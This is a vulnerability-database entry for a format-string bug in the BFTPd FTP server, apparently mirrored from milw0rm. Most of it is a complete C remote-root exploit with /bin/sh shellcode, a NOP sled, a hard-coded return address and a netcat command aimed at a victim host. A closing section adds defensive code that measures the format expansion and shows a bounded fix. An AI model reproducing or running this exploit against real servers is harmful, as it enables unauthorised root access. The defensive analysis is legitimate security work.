BFTPd – ‘vsprintf()’ Format Strings
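Vulnerability ID | 1053491 | Vulnerability type | |
Published | 2000-11-29 | Updated | 2000-11-29 |
CVE ID | N/A |
CNNVD-ID | N/A |
Platform | Linux | CVSS score | N/A |
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit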
/*
* Copyright (c) 2000 - Security.is
*
* The following material may be freely redistributed, provided
* that the code or the disclaimer have not been partly removed,
* altered or modified in any way. The material is the property
* of security.is. You are allowed to adopt the represented code
* in your programs, given that you give credits where it's due.
*
* A no-name ftp-server has a serious bug which leads to remote root.
* Anyway, we exploit vsprintf() via format-string.
*
* Discovered/coded by: DiGiT - [email protected]
* Greets: security.is, ADM
* note: Coded during security.is weekend ;>
*
* Run like: (./bftpexp ; cat) | nc bftpd.victim.com 21
* offset is optional and is arg1
*
*/
#include <stdio.h>
#include <stdlib.h> /* atoi() */
#include <string.h> /* memset(), strcpy(), strcat(), strlen() */

char shellcode[] =
    "\x31\xc0\x31\xdb\x04\x0b\xcd\x80\x31\xc0\x40\x40\xcd\x80\x85"
    "\xc0\x75\x28\x89\xd9\x31\xc0\x41\x04\x3f\xcd\x80\x31\xc0\x04"
    "\x3f\x41\xeb\x1f\x31\xc0\x5f\x89\x7f\x08\x88\x47\x07\x89\x47"
    "\x0c\x89\xfb\x8d\x4f\x08\x8d\x57\x0c\x04\x0b\xcd\x80\x31\xc0"
    "\x31\xdb\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

#define ADDR 0xbffff83c

int main(int argc, char *argv[])
{
    char lenbuf[1024], nopbuf[256], addrbuf[32], buf[256];
    int offset = 0, length, nopcount = 100, i;
    long nop_addr = ADDR;

    /* Optional first argument: offset added to the hard-coded address. */
    if (argc > 1)
        offset = atoi(argv[1]);

    /* NOP sled; terminate it so strcpy() below stops after nopcount bytes. */
    memset(nopbuf, '\x90', nopcount);
    nopbuf[nopcount] = '\0';
    nop_addr = nop_addr + offset;

    strcpy(buf, nopbuf);
    strcat(buf, shellcode);

    /* "%.<length>d" precision directive, expanded by the server's vsprintf(). */
    length = 1024 - strlen(shellcode) - nopcount + 4 - 14;
    strcat(buf, "%.");
    sprintf(lenbuf, "%dd", length);
    strcat(buf, lenbuf);

    /* Address as four little-endian bytes, appended four times. */
    sprintf(addrbuf, "%c%c%c%c",
            (unsigned char) ((nop_addr >> 0) & 0xff),
            (unsigned char) ((nop_addr >> 8) & 0xff),
            (unsigned char) ((nop_addr >> 16) & 0xff),
            (unsigned char) ((nop_addr >> 24) & 0xff));
    for (i = 0; i < 4; i++)
        strcat(buf, addrbuf);

    fprintf(stderr, "Bftpd remote exploit, by DiGiT\n");
    fprintf(stderr, "Using Address = 0x%lx\n", nop_addr);
    printf("%s\n", buf);
    return 0;
}
// milw0rm.com [2000-11-29]
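The exploit above sends a "%.<N>d" directive, and its header comment names vsprintf() as the sink. The C program below is an added example, not bftpd source and not the exploit author's code: it measures how far such a directive expands when client text is used as the format string, and shows the bounded, constant-format alternative. The function names, the 1024-byte reply size and the sample input are assumptions.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define REPLY_MAX 1024 /* assumed size, taken from the 1024 in the exploit's length math */

/* Bounded formatter: writes at most n bytes and returns the length the
 * complete output would have needed (vsnprintf semantics). */
static int bounded_format(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    int needed;

    va_start(ap, fmt);
    needed = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return needed;
}

/* Vulnerable pattern, measured without writing anything: client text is
 * used AS the format string. out=NULL with n=0 only computes the length;
 * the dummy int gives "%.<N>d" a defined argument to consume. */
int bytes_if_used_as_format(const char *client_text)
{
    return bounded_format(NULL, 0, client_text, 0);
}

/* Hardened pattern: constant format, client text is data only, output is
 * bounded. Returns 0 if the reply fit, -1 if it was truncated. */
int safe_reply(char *out, size_t n, const char *client_text)
{
    int needed = bounded_format(out, n, "%s", client_text);

    return (needed >= 0 && (size_t)needed < n) ? 0 : -1;
}

int main(void)
{
    const char sample[] = "USER %.2000d"; /* constructed input */
    char reply[REPLY_MAX];
    int rc = safe_reply(reply, sizeof reply, sample);

    printf("%zu input bytes expand to %d bytes as a format (buffer is %d)\n",
           strlen(sample), bytes_if_used_as_format(sample), REPLY_MAX);
    printf("as data: rc=%d reply=\"%s\"\n", rc, reply);
    return 0;
}
```

An unbounded vsprintf() into a fixed buffer would have written the whole expanded length; the bounded call with a constant "%s" format leaves the directive inert and reports truncation instead.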